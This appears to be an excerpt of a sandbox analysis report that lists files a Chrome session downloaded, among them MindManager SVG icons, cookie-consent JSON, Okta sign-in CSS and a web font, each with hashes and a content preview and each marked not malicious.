                                                                SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                                SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://btee.pradjoun.com/45YpFQtsl4GObIK3IabAjh9b9MIVkxy69
                                                                Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):75415
                                                                Entropy (8bit):4.132983792409182
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:666D2267D2AB5470E475ADCA2A4BF1F3
                                                                SHA1:F981BC5B3C350D0C48296FAAA94634FDBCDCFF9E
                                                                SHA-256:AB0737409559C0E7F3F612740CC1E2323D0E5008201B005DC1A11FF5D3E2C789
                                                                SHA-512:EBACB6C71461D276C1DDE3430DB955AD5EC603DD68489AB64A9B506594825DC59DFFEBE807702A06DD9337DE27B62B42A746B41BB639109E2E6BF16900C36C4E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/cards/cards_meetings_collaboration.svg
                                                                Preview:<svg width="200" height="250" viewBox="0 0 200 250" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_6023)">..<rect width="200" height="250" rx="10" fill="#CCEBEA"/>..<path d="M74.8813 98.3982C57.245 85.0509 35.1112 81.9591 25.5828 103.435C17.1261 122.496 35.6051 144.106 44.1885 160.146C54.4182 179.262 30.4716 208.516 46.7118 223.114C61.3578 236.279 101.561 227.885 116.641 217.234C131.929 206.436 138.758 186.273 153.955 174.934C174.891 159.314 178.62 139.144 175.901 126.647C164.023 72.0448 103.919 120.374 74.881 98.3982H74.8813Z" fill="#A3DEDC"/>..<g opacity="0.8">..<path d="M95.3196 151.371H174.365C176.971 151.371 179.084 149.258 179.084 146.652V100.701C179.084 98.094 176.971 95.981 174.365 95.981H95.3196C92.7131 95.981 90.6 98.094 90.6 100.701V146.652C90.6 149.258 92.7131 151.371 95.3196 151.371Z" fill="white"/>..</g>..<path d="M106.12 99.2734H112.512C117.01 99.2734 120.656 95.6272 120.656 91.1294V91.1293C120.656 86.6315 117.01 82.9853 112.512 82.9853H106
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):873
                                                                Entropy (8bit):4.839303297171477
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7B948CB3226918BEDF3AAA1233A92D23
                                                                SHA1:1717B0F94797458C593768191A3E2B6A3EB0E8F3
                                                                SHA-256:A74BD2BB3DD8CF98BC1FB189225C1FD50E283B947680FEB96E97F3003077B8E6
                                                                SHA-512:56EA78FEA60F73274E310C1188D5495958BD0D05F62A9AA3D08446164903DB70EDF9645B8FF67EC7E7D8415FB7DB2B2F83952BF9CDC297DB3F995848A5EB1692
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/context_checkmark.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 15.47 12.25"><defs><style>.cls-1{fill:#7db0df;}.cls-2{fill:#4f87c6;}</style></defs><title>context_checkmark</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M.5,6.42h0s0-.06,0-.12a.28.28,0,0,1,0-.13l.54-.45a1.13,1.13,0,0,1,.73-.27,1.16,1.16,0,0,1,.81.33L5,8.18a.88.88,0,0,0,.69.34.94.94,0,0,0,.75-.39L13.61.56,14.8,2.15,5.72,11.7Z"/><path class="cls-2" d="M13.57,1.34l.57.77L5.72,11,1.12,6.34l.27-.23A.65.65,0,0,1,1.8,6a.66.66,0,0,1,.46.19L4.64,8.5A1.42,1.42,0,0,0,5.72,9a1.44,1.44,0,0,0,1.11-.54l6.74-7.14m0-1.34a.42.42,0,0,0-.34.19L6.07,7.83a.41.41,0,0,1-.69,0L3,5.44A1.64,1.64,0,0,0,1.8,5a1.65,1.65,0,0,0-1,.38l-.61.51A.81.81,0,0,0,0,6.31a.86.86,0,0,0,.14.47l5.24,5.28a.41.41,0,0,0,.69,0l9.26-9.75c.19-.26.19,0,0-.28L14,.19A.42.42,0,0,0,13.62,0Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:JSON data
                                                                Category:downloaded
                                                                Size (bytes):111878
                                                                Entropy (8bit):5.31425808258489
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:3789793FB6C05BFD81F9F44D9D48229A
                                                                SHA1:411B38663EB19AF003CDC96C074220CD58363873
                                                                SHA-256:DAD1A909A66D0BED4415EB42D21B2F4489DD4FCE67D70F7EE0D74A98F641FBDE
                                                                SHA-512:98D75CD197F33A3CACF5C5CB82D603A6FD98ED851FC399176B6B405273D7D0CB6AFD81B5A524B0B2C42D19728F0EB0C763C43D5A8E0A2D60B21BB5B258BA4CD1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://cdn.cookielaw.org/consent/eed76835-ae82-4859-b68b-69c7a2ea639c/018df7a8-de7d-7f0b-8051-41f5786e3883/en.json
                                                                Preview:{"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","pccontinueWithoutAcceptText":"Continue without Accepting","pccloseButtonType":"Icon","MainText":"Privacy Preference Center","MainInfoText":"When you visit any website, it may store or retrieve information on your browser, mostly in the form of cookies. This information might be about you, your preferences or your device and is mostly used to make the site work as you expect it to. The information does not usually directly identify you, but it can give you a more personalized web experience. Because we respect your right to privacy, you can choose not to allow some types of cookies. Click on the different category headings to find out more and change our default settings. However, blocking some types of cookies may impact your experience of the site and the services we are able to offer.","AboutText":"More information","AboutCookiesText":"Your Priv
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):613
                                                                Entropy (8bit):5.253876378854211
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:275819E7A189E43636A00D46E82B2688
                                                                SHA1:35D7028AFB9FFD66E1B223E961DE70B84749B0A3
                                                                SHA-256:68BA3217D1ADAFF979D701DDC7EF7192BC33C76A1DE53CE9E2DA52EE1BFD8F26
                                                                SHA-512:C5993E50B9C6BEAC5B9834BA93898AEED5A6988C0C86DCDD6E4C11289321BD8F39129F98FD55A136B40E35206911CB65C0477F4FAADC538931744D5C426E0897
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PrioritiesSVG/priority04.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#febf00;}.cls-2{fill:#dd9505;}.cls-3{fill:#fff;}</style></defs><title>priority04</title><rect class="cls-1" x="0.5" y="0.5" width="15" height="15" rx="0.5" ry="0.5"/><path class="cls-2" d="M15,1V15H1V1H15m0-1H1A1,1,0,0,0,0,1V15a1,1,0,0,0,1,1H15a1,1,0,0,0,1-1V1a1,1,0,0,0-1-1Z"/><path class="cls-2" d="M4,11V9.44L7.94,3H11V9h1v2H10v2H8V11ZM6,9H9V5H8a3.94,3.94,0,0,1-.33,1.22L6,8.52Z"/><path class="cls-3" d="M3,10V8.44L6.94,2H10V8h1v2H9v2H7V10ZM5,8H8V4H7a3.94,3.94,0,0,1-.33,1.22L5,7.52Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1158
                                                                Entropy (8bit):5.156170633881723
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5EAFD7F3E00D6E2F5D3B99FB891C32D9
                                                                SHA1:C2F52E315FFCE5B9862FAAED6CDDDF11C408B557
                                                                SHA-256:CC8A877606954B8D78C41AC6DC749388EDC39A5201ED776E9B2C34B24E9913A3
                                                                SHA-512:4C1F2941988C2628E5B59E10E1D1EB3432CD9F9B7ECE8872DDCDBB23E552C4F9F1A30853C3DF526B5DD1CD14E1E67E9A6128EDA3295B0061FBD7BF74042284F6
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/RollUp/roll-up.svg
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 19.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... width="16px" height="16px" viewBox="0 0 16 16" enable-background="new 0 0 16 16" xml:space="preserve">..<line fill="none" stroke="#444444" stroke-miterlimit="10" x1="8.1" y1="8.1" x2="4.5" y2="11.7"/>..<rect x="7" y="3" fill="#444444" width="1" height="6"/>..<g>...<rect x="12" y="13" fill="#4F8C0E" width="2" height="3"/>...<polygon fill="#4F8C0E" points="10.1,13 13.1,7.8 16.1,13 ."/>..</g>..<path fill="#444444" d="M10,14.1c-0.6,0.2-1.3,0.3-2,0.3c-2.9,0-5.4-1.9-6.2-4.5c0-0.1,0-0.1-0.1-0.2C1.7,9.4,1.6,9.2,1.6,8.9...c0-0.3-0.1-0.5-0.1-0.8c0,0,0-0.1,0-0.1c0,0,0-0.1,0-0.1c0-0.3,0-0.6,0.1-0.8c0-0.3,0.1-0.5,0.2-0.8c0-0.1,0-0.1,0.1-0.2...C2.6,3.4,5.1,1.5,8,1.5c2.9,0,5.3,1.9,6.2,4.5c0.1,0.4,0.2,0.7,0.2,1h0.8c-0.5-3.7-3.5-6.5-7.3-6.5c-
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1137
                                                                Entropy (8bit):4.795550007812488
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6FC3FA6791E305AA7703A3ECBF24EE9D
                                                                SHA1:D31B152E8E242DC9D744B87D69979736261CABE6
                                                                SHA-256:D51F6B213280F26B6396C5CCDEA41184A7CB5378BC664432F98EE0EB58213942
                                                                SHA-512:E9A5A9F5AC243ABC36947E267140F114326B8BA4B66D2D5B517CFD6487EAD87876E7937B33DE7B32789D145D7244803A68DDBA6E38DBDD12D8C4382C24EF1596
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PrioritiesSVG/priority03.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#79c516;}.cls-2{fill:#2eaf34;}.cls-3{fill:#fff;}</style></defs><title>priority03</title><rect class="cls-1" x="0.5" y="0.5" width="15" height="15" rx="0.5" ry="0.5"/><path class="cls-2" d="M15,1V15H1V1H15m0-1H1A1,1,0,0,0,0,1V15a1,1,0,0,0,1,1H15a1,1,0,0,0,1-1V1a1,1,0,0,0-1-1Z"/><path class="cls-2" d="M5.6,12.22l1.12-2a2.64,2.64,0,0,0,2,.93,1.55,1.55,0,0,0,1-.29.93.93,0,0,0,.36-.74C10,9.38,9.44,9,8.26,9H7.85L7.34,7.57,8.65,6c.14-.17.28-.34.43-.49a3.71,3.71,0,0,1,.33-.34L9,5.05V5c.3.05,0,.07-.43,0H6V3h6V4.59L10.07,7A2.82,2.82,0,0,1,11.75,8.1,3.16,3.16,0,0,1,12.37,10a3.68,3.68,0,0,1-.92,2.51,3.3,3.3,0,0,1-2.6,1.05A4.19,4.19,0,0,1,5.6,12.22Z"/><path class="cls-3" d="M4.6,11.22l1.12-2a2.64,2.64,0,0,0,2,.93,1.55,1.55,0,0,0,1-.29A.93.93,0,0,0,9,9.15C9,8.38,8.44,8,7.26,8H6.85L6.34,6.57,7.65,5c.14-.17.28-.34.43-.49a3.71,3.71,0,0,1,.33-.34L8,4.05V4c.3.05,0,.07-.43,0H5V2h6V3.59L9.0
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (51734)
                                                                Category:downloaded
                                                                Size (bytes):222931
                                                                Entropy (8bit):5.0213311632628725
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0329C939FCA7C78756B94FBCD95E322B
                                                                SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                                SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                                SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                                Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):930
                                                                Entropy (8bit):5.009917867921463
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B76096EAF7F4F0AA88B58512EED6AB12
                                                                SHA1:6F27EA6006C9CB0E63BFF5F0973FE020D4EFFFCA
                                                                SHA-256:4C30EB98C4BC25C3932125463F4A1093B3D668A30EF348BFF463527175128334
                                                                SHA-512:FB68EBF5263EE04F6A9268BDD0F45A3EBAF8C516FA5D39F14EFBDF6FD76B386E9E68C95D2615E4EDC787B194524AFA415B7CB569334ABAC59E801217068A786E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/modern/topic_info_icon_slide.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:gray;}.cls-2{fill:#b3b3b3;}.cls-3{fill:#fff;}.cls-4{fill:#4f87c6;}</style></defs><title>topic_info_icon_slide</title><path class="cls-1" d="M8.71,2A1.29,1.29,0,0,1,10,3.29V6.71A1.29,1.29,0,0,1,8.71,8H2.29A1.29,1.29,0,0,1,1,6.71V3.29A1.29,1.29,0,0,1,2.29,2H8.71m0-1H2.29A2.3,2.3,0,0,0,0,3.29V6.71A2.3,2.3,0,0,0,2.29,9H8.71A2.3,2.3,0,0,0,11,6.71V3.29A2.3,2.3,0,0,0,8.71,1Z"/><rect class="cls-2" x="3" y="4" width="5" height="2" rx="0.57"/><rect class="cls-3" x="2.5" y="5.5" width="13" height="10" rx="1.6"/><path class="cls-4" d="M13.9,6A1.1,1.1,0,0,1,15,7.1v6.8A1.1,1.1,0,0,1,13.9,15H4.1A1.1,1.1,0,0,1,3,13.9V7.1A1.1,1.1,0,0,1,4.1,6h9.8m0-1H4.1A2.11,2.11,0,0,0,2,7.1v6.8A2.11,2.11,0,0,0,4.1,16h9.8A2.11,2.11,0,0,0,16,13.9V7.1A2.11,2.11,0,0,0,13.9,5Z"/><rect class="cls-4" x="6" y="9" width="6" height="3"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):388
                                                                Entropy (8bit):5.1767644135222985
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F47A537DAD7A5C2D8F505FBCFFF733AF
                                                                SHA1:EED48F624EC702BF9021E7D179C86985DC26A00D
                                                                SHA-256:63567FA47B3BB9E69C53514E412B90C201A0A66544A560995E999AEBDAF0C9CC
                                                                SHA-512:216FD24F8D9346E5A461529145CDEB0F1E1DA634ED69E82A1ED74E2CF799A994D163DA52A9DE16FD9E5B58845FFB71EE8C57237515092F4FBF7239059C03E870
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/objects/circle.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}</style></defs><title>background_shape_Asset 70</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):545
                                                                Entropy (8bit):5.200772332565807
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:76EC1B9884761BF1CCF06E4EA347CFD9
                                                                SHA1:FCFF9996CD1829D5D1CE3802127BFF84D2B8DBD2
                                                                SHA-256:35EE74EA2094142E6F41C08573BFD4399C3EB020A7625BAEB58EDB9EEC79E444
                                                                SHA-512:E5EA977B88EED71C24446F86C8C16E1CC350CD0D2382ECAFC9EEF131E8FF1EAAC66393843E5EB5A281C3717E691924F4E11885B3CE29D06EB7E0EEEAE15B64E4
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/design/layout-org-chart.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 9 11"><defs><style>.cls-1{fill:none;stroke:#3271ae;}.cls-1,.cls-2{stroke-miterlimit:10;}.cls-2{fill:#efeeee;stroke:#4a4a4a;}</style></defs><title>layout-org-chart</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><line class="cls-1" x1="4.5" y1="5" x2="4.5" y2="7"/><path class="cls-1" d="M.5,11V9A1.48,1.48,0,0,1,2,7.5H7A1.48,1.48,0,0,1,8.5,9v2"/><circle class="cls-2" cx="5" cy="3" r="2.5"/><line class="cls-1" x1="4.5" y1="8" x2="4.5" y2="11"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):454
                                                                Entropy (8bit):5.035320078484337
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A14CB4A0A5AF9E98FA720D4E2935A85A
                                                                SHA1:E6BE46996E2BA36A872F22AD5CFEDCFF9E101505
                                                                SHA-256:201153CD9B04A9C49F9B3C40E59D85B27A43FEA38914D10ED3D3F26696CC57DA
                                                                SHA-512:93E8035E441A4F4E4E2133D758DB2D632172519C635D04B678FA3C150DE1E0A921807BA69C01AFF02B9A31C701F963C89946FDA5F38200E2F88CCE26ED6F5DF8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/right-chevron.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 18.99"><defs><style>.cls-1{fill:#3a52a4;}</style></defs><title>right chevron</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M.31,19a.39.39,0,0,1-.16-.11.5.5,0,0,1,0-.7L8.79,9.5.15.85A.48.48,0,0,1,0,.5.48.48,0,0,1,.15.15.48.48,0,0,1,.5,0,.48.48,0,0,1,.85.15l9,9a.51.51,0,0,1,0,.71l-9,9A.39.39,0,0,1,.69,19a.55.55,0,0,1-.38,0Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):562
                                                                Entropy (8bit):4.890552307828092
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:72B64B4A17A15B7B5C8C7B117E1B3F39
                                                                SHA1:EE018755CF7A7BAB56AC8DE9CA3327036B132C4D
                                                                SHA-256:647DBCCDC8B3836D25E722AA96D8CCE62E974DEB73CF11AF60F403E03F98C9D5
                                                                SHA-512:05B03EAEF3304CFD259D70BECEAA3DC5DF05F8EADA5963C3FEF4D5DB3A2A9EC5B77E34EB393434832D0F45593433C825E41CEEAEBFBC2786D5C09AD2EA465B58
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/smiley-neutral.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fbb400;}.cls-2{fill:#f9cd75;}.cls-3{fill:#333;}</style></defs><title>emoji_15_16</title><circle class="cls-1" cx="8" cy="8" r="8"/><circle class="cls-2" cx="11" cy="7" r="2"/><circle class="cls-2" cx="5" cy="7" r="2"/><rect class="cls-3" x="6" y="11" width="4" height="1"/><rect class="cls-2" x="6" y="12" width="4" height="1"/><rect class="cls-3" x="4" y="6" width="2" height="2"/><rect class="cls-3" x="10" y="6" width="2" height="2"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1409
                                                                Entropy (8bit):4.63084328555819
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FD9F7E82335E79B19F94D0A91ECBB28E
                                                                SHA1:DE2590A8D1CC376670E2CAABF449A66CDE0F71A9
                                                                SHA-256:464330466479DA36410887FD0EB0BA027A30B5C05626A57F11F29BEE42DBD46B
                                                                SHA-512:8F208480D9181AD0C1CCC95053A87451FF2A789140B539CC3EC680FFA94D76E4666AAF48746DB5A24FECF974AA3AF4367D6882568223A43B4753FD9406F71579
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/overlay-panel/status-publish-alert.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24.82 17.07"><defs><style>.cls-1{fill:#f7dbbf;}.cls-2{fill:#d37118;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M12.54,14.25,17.05,6.7a1.76,1.76,0,0,1,1.36-.85,4.63,4.63,0,0,0-2.16-.6h-.5c-.46-3.5-3.52-6-6.9-5.07-4.52,1.21-3.1,5.66-3.1,5.66-.61,0-6.16,1-5.67,4.38v1.13c-.49,1.64,1.24,2.9,3.55,2.9h8.91Z"/><path class="cls-2" d="M12.54,14.25l.5-.83H3.62A3.32,3.32,0,0,1,1,12.47a1,1,0,0,1-.15-.88l0-.11V10.1a1.81,1.81,0,0,1,.45-1.51C2.49,7.25,5.27,6.68,5.75,6.67H6.88L6.54,5.59a4.43,4.43,0,0,1,.23-3A3.5,3.5,0,0,1,9.07,1,4.79,4.79,0,0,1,10.25.83a4.9,4.9,0,0,1,4.67,4.53l.1.72h1.23a3.54,3.54,0,0,1,1.13.22,1.75,1.75,0,0,1,1-.45,4.63,4.63,0,0,0-2.16-.6h-.5A5.76,5.76,0,0,0,10.25,0a5.3,5.3,0,0,0-1.4.19c-4.52,1.2-3.1,5.65-3.1,5.65-.61,0-6.16,1-5.67,4.38v1.13c-.49,1.64,1.24,2.9,3.54,2.9h8.92Z"/><path class="cls-1" d="M15.63,16.86a1,1,0,0,1-.92-.54,1.06,1.06,0,0,1,0-1.06l4-6.62a1,1,0
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1187
                                                                Entropy (8bit):5.103943538902858
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BC11FD6D986CDB25985E45CEC6648954
                                                                SHA1:E811AAEE8F4BB35866D1BF721FD8732B4D59E7EF
                                                                SHA-256:98BBF0CE9E961B7C2F6268F901323BCCA577C8FDC6BBB292EE0D9D4C07A5E2A5
                                                                SHA-512:9DA17FCB4EABA5055798F74DBFC6A10401102633BC076CCFE78960EAA42EC9C2211B45F981F76851129DF3510C41388AABA3AADCA71472CCEFCF50DABF7805D3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-terminal-none.svg
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 19.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="60.7px"... height="36px" viewBox="0 0 60.7 36" enable-background="new 0 0 60.7 36" xml:space="preserve">..<g id="home">..</g>..<g id="save">..</g>..<g id="export">..</g>..<g id="edit">..</g>..<g id="copy">..</g>..<g id="paste">..</g>..<g id="cut">..</g>..<g id="delete">..</g>..<g id="add_floating">..</g>..<g id="add_sibling">..</g>..<g id="add_child">..</g>..<g id="add_callout">..</g>..<g id="add_image">..</g>..<g id="add_link">..</g>..<g id="add_attachment">..</g>..<g id="add_tag">..</g>..<g id="add_resource">..</g>..<g id="add_due_date">..</g>..<g id="add_progress">..</g>..<g id="undo">..</g>..<g id="redo">..</g>..<g id="customize_ui">..</g>..<g id="open_accordian_menu">..</g>..<g id="close_accordian_menu">..</g>..<g id="other">...<
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1945
                                                                Entropy (8bit):4.161398729660002
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F41D4E76C4975B812E22F0A7D0A6EEB1
                                                                SHA1:9FA974F46A153A29EF434C0FD0A4A2DF2AFE9C23
                                                                SHA-256:E9BB6555B5F0B7D76169C4B80F8CBBA4D1C3F02DF78F8D4F27FD4318250F3776
                                                                SHA-512:A0DC92F7F7BFAB65358AAA18DD1DD7888CBF9C4174856E34316777FEBAB2A31BB01CA8077610FB3CF410757312CAECDAC94D205760D43042F69BF7EAD5D447E1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/pin-hover.svg
                                                                Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0)">...<path d="M 21.598 7.352 L 15.246 1 C 15.137 0.891 15.008 0.805 14.859 0.742 C 14.711 0.68 14.559 0.648 14.402 0.648 C 14.238 0.648 14.082 0.68 13.934 0.742 C 13.793 0.805 13.664 0.891 13.547 1 L 13.195 1.352 C 13.023 1.523 12.879 1.746 12.762 2.02 C 12.652 2.293 12.598 2.555 12.598 2.805 L 12.598 4 C 12.598 4.086 12.57 4.191 12.516 4.316 C 12.469 4.441 12.414 4.535 12.352 4.598 L 9 7.949 C 8.938 8.012 8.844 8.07 8.719 8.125 C 8.594 8.172 8.488 8.195 8.402 8.195 L 7.195 8.195 C 6.953 8.195 6.695 8.254 6.422 8.371 C 6.148 8.48 5.926 8.625 5.754 8.805 L 5.402 9.156 C 5.168 9.391 5.051 9.672 5.051 10 C 5.051 10.328 5.168 10.609 5.402 10.844 L 7.266 12.707 L 1.324 20.43 C 1.23 20.555 1.188 20.691 1.195 20.84 C 1.211 20.988 1.27 21.117 1.371 21.227 C 1.434 21.281 1.5 21.324 1.57 21.356 C 1.648 21.387 1.727 21.402 1.805 21.402 C 1.867 21.402 1.93 21.395 1.992 21.379 C 2.0
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
